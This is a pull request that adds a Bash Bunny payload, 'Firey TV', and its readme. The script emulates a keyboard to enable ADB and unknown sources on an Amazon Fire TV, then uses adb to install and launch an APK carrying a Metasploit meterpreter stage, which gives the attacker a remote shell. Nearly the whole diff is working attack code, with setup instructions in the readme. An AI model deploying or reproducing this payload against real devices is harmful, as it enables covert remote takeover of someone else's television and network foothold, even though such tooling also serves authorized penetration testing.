### PR TITLE
Added a payload to enable ADB and Unknown sources on an Amazon FireTV, then use ADB to install an APK containing a meterpreter shell

### DIFF
--- a/payloads/library/fireytv/payload.txt
+++ b/payloads/library/fireytv/payload.txt
@@ -1,0 +1,75 @@
+# Title:         Firey TV
+# Author:        DemmSec
+# Version:       1.0
+#
+# Enables ADB and unknown sources on a target FireTV
+# Then pushes a payload APK via ADB
+#
+# Requires android-tools-adb installed on the Bash Bunny
+#
+# Purple ............Running HID emulation, enabling ADB and unknown sources
+# Blue Blinking ...............Running ADB command to push payload.apk
+# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
+# Green..............Finished
+ATTACKMODE HID
+LED R B 0
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q DOWNARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 200
+Q RIGHTARROW
+Q DELAY 500
+Q ENTER
+Q DELAY 500
+Q DOWNARROW
+Q DELAY 800
+Q ENTER
+Q DELAY 800
+Q ENTER
+Q DELAY 500
+Q DOWNARROW
+Q DELAY 500
+Q DOWNARROW
+Q DELAY 500
+Q ENTER
+Q DELAY 200
+Q ENTER
+Q DELAY 200
+Q ESCAPE
+Q DELAY 200
+Q ESCAPE
+Q DELAY 200
+Q ESCAPE
+Q DELAY 200
+Q ESCAPE
+Q DELAY 200
+Q ESCAPE
+ATTACKMODE ECM_ETHERNET
+LED B 2000
+source bunny_helpers.sh
+if [ -z "${TARGET_IP}" ]; then
+    LED R 2000
+	exit 1
+fi
+adb connect ${TARGET_IP}
+adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
+adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
+LED G

--- a/payloads/library/fireytv/readme.md
+++ b/payloads/library/fireytv/readme.md
@@ -1,0 +1,28 @@
+# Meterpreter shell on an Amazon Fire TV
+
+* Author: DemmSec
+* Version: Version 1.0
+* Target: Amazon FireTV (Latest Firmware/Version)
+
+
+## Description
+
+Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it.
+
+## Requirements
+
+Requires: android-tools-adb
+To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb
+
+## Configuration
+
+Create a payload APK file and place it in the same directory as payload.txt, plug in and wait.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple             | Running keyboard emulation                   |
+| Blue Blinking      | Running ADB to push payload to Fire TV       |
+| Red Blinking       | Fire TV failed to get an IP address          |
+| Green              | Finished                                     |


### PR DESCRIPTION
Added a payload to enable ADB and Unknown sources on an Amazon FireTV, then use ADB to install an APK containing a meterpreter shell.